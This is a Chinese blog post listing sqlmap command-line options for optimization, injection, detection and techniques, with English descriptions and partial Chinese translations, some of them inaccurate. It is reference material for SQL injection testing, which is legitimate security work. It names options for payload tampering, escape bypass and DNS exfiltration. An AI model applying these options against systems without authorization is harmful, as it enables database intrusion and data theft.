本文已参与「新人创作礼」活动,一起开启掘金创作之路。
4. Optimization(优化)
-o Turn on all optimization switches
--predict-output Predict common queries output 预测普通查询输出
--keep-alive Use persistent HTTP(s) connections 使用持久HTTP(S)连接
--null-connection Retrieve page length without actual HTTP response body 在没有实际 HTTP 响应正文的情况下检索页面长度
--threads=THREADS Max number of concurrent HTTP(s) requests (default 1) 当前http(s)最大请求数 (默认 1)
5. Injection(注入)
-p TESTPARAMETER Testable parameter(s) 可测试的参数
--skip=SKIP Skip testing for given parameter(s)
--skip-static Skip testing parameters that not appear to be dynamic 跳过测试不显示为动态的参数
--param-exclude=.. Regexp to exclude parameters from testing (e.g. "ses") 使用正则表达式排除参数进行测试
--param-filter=P.. Select testable parameter(s) by place (e.g. "POST") 按位选择可测试参数
--dbms=DBMS Force back-end DBMS to provided value
--dbms-cred=DBMS.. DBMS authentication credentials (user:password)
--os=OS Force back-end DBMS operating system to provided value
--invalid-bignum Use big numbers for invalidating values 使用大数字使值无效
--invalid-logical Use logical operations for invalidating values
--invalid-string Use random strings for invalidating values
--no-cast Turn off payload casting mechanism 关闭有效载荷铸造机制
--no-escape Turn off string escaping mechanism 关闭字符串逃逸机制
--prefix=PREFIX Injection payload prefix string 注入payload字符串前缀
--suffix=SUFFIX Injection payload suffix string 注入payload字符串后缀
--tamper=TAMPER Use given script(s) for tampering injection data 使用给定的脚本篡改注入数据
6. Detection(检测)
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1)
--string=STRING String to match when query is evaluated to True
--not-string=NOT.. String to match when query is evaluated to False
--regexp=REGEXP Regexp to match when query is evaluated to True 查询时有效时在页面匹配正则表达式
--code=CODE HTTP code to match when query is evaluated to True
--smart Perform thorough tests only if positive heuristic(s) 只有在积极的启发式(S)时才执行彻底的测试
--text-only Compare pages based only on the textual content
--titles Compare pages based only on their titles
7. Techniques: (技巧)
--technique=TECH.. SQL injection techniques to use (default "BEUSTQ")
--time-sec=TIMESEC Seconds to delay the DBMS response (default 5)
--union-cols=UCOLS Range of columns to test for UNION query SQL injection 用于测试 UNION 查询 SQL 注入的列范围
--union-char=UCHAR Character to use for bruteforcing number of columns 暴力猜测列的字符数
--union-from=UFROM Table to use in FROM part of UNION query SQL injection SQL注入UNION查询使用的格式
--dns-domain=DNS.. Domain name used for DNS exfiltration attack
--second-url=SEC.. Resulting page URL searched for second-order response
--second-req=SEC.. Load second-order HTTP request from file